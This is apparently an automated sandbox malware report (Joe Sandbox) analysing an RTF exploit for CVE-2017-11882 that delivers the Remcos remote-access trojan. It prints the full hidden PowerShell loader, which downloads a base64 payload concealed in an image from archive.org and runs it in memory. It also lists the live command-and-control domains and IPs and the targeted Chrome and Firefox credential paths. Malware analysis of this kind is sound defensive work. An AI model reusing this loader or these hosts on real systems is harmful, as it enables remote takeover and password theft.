?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?d
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.csedr/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dc? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?v? ? ? ? ?gk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?mg? ? ? ? ?w? ? ? ? ?di? ? ? ? ?n? ? ? ? ?? ? ? ? ?w? ? ? ? ?dk? ? ? ? ?m? ? ? ? ?? ? ? ? ?1? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.csedr/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434CB6 cpuid 9_2_00434CB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_0045201B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_004520B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_00452143
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_00452393
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00448484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_004524BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_004525C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00452690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_0044896D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,9_2_0040F90C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,9_2_00451D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00451FD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004489D7 GetSystemTimeAsFileTime,9_2_004489D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B69E GetUserNameW,9_2_0041B69E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_00449210
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data9_2_0040BA4D
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\9_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db9_2_0040BB6B

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-GT4655Jump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe9_2_0040569A

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		Valid Accounts1
                Native API                		111
                Scripting                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		13
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts53
                Exploitation for Client Execution                		1
                DLL Side-Loading                		1
                Bypass User Account Control                		2
                Obfuscated Files or Information                		111
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol111
                Input Capture                		21
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts31
                Command and Scripting Interpreter                		1
                Windows Service                		1
                Access Token Manipulation                		1
                Install Root Certificate                		2
                Credentials In Files                		1
                System Service Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution                		Login Hook1
                Windows Service                		1
                DLL Side-Loading                		NTDS3
                File and Directory Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts3
                PowerShell                		Network Logon Script221
                Process Injection                		1
                Bypass User Account Control                		LSA Secrets34
                System Information Discovery                		SSHKeylogging213
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials2
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Modify Registry                		DCSync21
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Virtualization/Sandbox Evasion                		Proc Filesystem2
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron221
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                Remote System Discovery                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1520534 Sample: SecuriteInfo.com.Exploit.CV... Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 22 other signatures 2->56 10 WINWORD.EXE 336 18 2->10         started        process3 file4 32 C:\Users\...\~WRD0000.tmp:Zone.Identifier, ASCII 10->32 dropped 34 C:\Users\user\Desktop\~WRD0000.tmp, Rich 10->34 dropped 36 SecuriteInfo.com.E...759.7388.rtf (copy), Rich 10->36 dropped 38 ~WRF{07782794-9C99...6-DEC334E5B758}.tmp, Composite 10->38 dropped 13 EQNEDT32.EXE 12 10->13         started        process5 dnsIp6 48 185.235.137.223, 49161, 49163, 80 AFRARASAIR Iran (ISLAMIC Republic Of) 13->48 40 C:\Users\...\someimportantmeetingsgoing.vBS, Unicode 13->40 dropped 86 Office equation editor establishes network connection 13->86 88 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->88 18 wscript.exe 1 13->18         started        file7 signatures8 process9 signatures10 58 Suspicious powershell command line found 18->58 60 Wscript starts Powershell (via cmd or directly) 18->60 62 Bypasses PowerShell execution policy 18->62 64 2 other signatures 18->64 21 powershell.exe 4 18->21         started        process11 signatures12 66 Suspicious powershell command line found 21->66 68 Suspicious execution chain found 21->68 24 powershell.exe 12 5 21->24         started        process13 dnsIp14 42 ia601706.us.archive.org 207.241.227.96, 443, 49162 INTERNET-ARCHIVEUS United States 24->42 70 Installs new ROOT certificates 24->70 72 Writes to foreign memory regions 24->72 74 Injects a PE file into a foreign processes 24->74 28 RegAsm.exe 3 24->28         started        signatures15 process16 dnsIp17 44 camzeroconnect.duckdns.org 28->44 46 camzeroconnect.duckdns.org 192.3.101.29, 14645, 49164, 49165 AS-COLOCROSSINGUS United States 28->46 76 Contains functionality to bypass UAC (CMSTPLUA) 28->76 78 Detected Remcos RAT 28->78 80 Contains functionalty to change the wallpaper 28->80 84 4 other signatures 28->84 signatures18 82 Uses dynamic DNS services 44->82

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf50%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf100%AviraTR/AVI.Obfuscated.vhsxu

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\Desktop\~WRD0000.tmp100%AviraEXP/CVE-2017-11882.Gen
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp100%AviraEXP/CVE-2017-11882.Gen

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://geoplugin.net/json.gp/C0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                camzeroconnect.duckdns.org
                		192.3.101.29
                		truetrue
                  		unknown
                  ia601706.us.archive.org
                  		207.241.227.96
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    camzeroconnect.duckdns.orgtrue
                      		unknown
                      http://185.235.137.223/220/RDESC.txttrue
                        		unknown
                        https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpgtrue
                          		unknown
                          http://185.235.137.223/220/someimportantmeetingsgoing.tIFtrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://185.235.137.223/220/someimportantmeetingsgoing.tIF$EQNEDT32.EXE, 00000002.00000002.359523259.00000000005F4000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://crl.entrust.net/server1.crl0powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://ocsp.entrust.net03powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.235.137.223/220/someimportantmeetingsgoing.tIF4EQNEDT32.EXE, 00000002.00000002.359523259.00000000005F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://185.235.137.223powershell.exe, 00000008.00000002.374544263.00000000025FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://185.235.137.223/220/someimportantmeetingsgoing.tIFjEQNEDT32.EXE, 00000002.00000002.359523259.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://geoplugin.net/json.gpRegAsm.exefalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://contoso.com/powershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://ia601706.us.archive.orgpowershell.exe, 00000008.00000002.374544263.00000000024DA000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              http://go.microsoft.cpowershell.exe, 00000008.00000002.373789088.00000000005CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://ocsp.entrust.net0Dpowershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.378843642.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.374544263.00000000023A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://secure.comodo.com/CPS0powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ia601706.us.archive.org/2/items/new_image_LRpowershell.exe, 00000006.00000002.378843642.0000000002412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://crl.entrust.net/2048ca.crl0powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      207.241.227.96
                                                      		ia601706.us.archive.orgUnited States
                                                      		7941INTERNET-ARCHIVEUStrue
                                                      192.3.101.29
                                                      		camzeroconnect.duckdns.orgUnited States
                                                      		36352AS-COLOCROSSINGUStrue
                                                      185.235.137.223
                                                      		unknownIran (ISLAMIC Republic Of)
                                                      		202391AFRARASAIRtrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1520534
                                                      Start date and time:2024-09-27 13:59:12 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 50s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
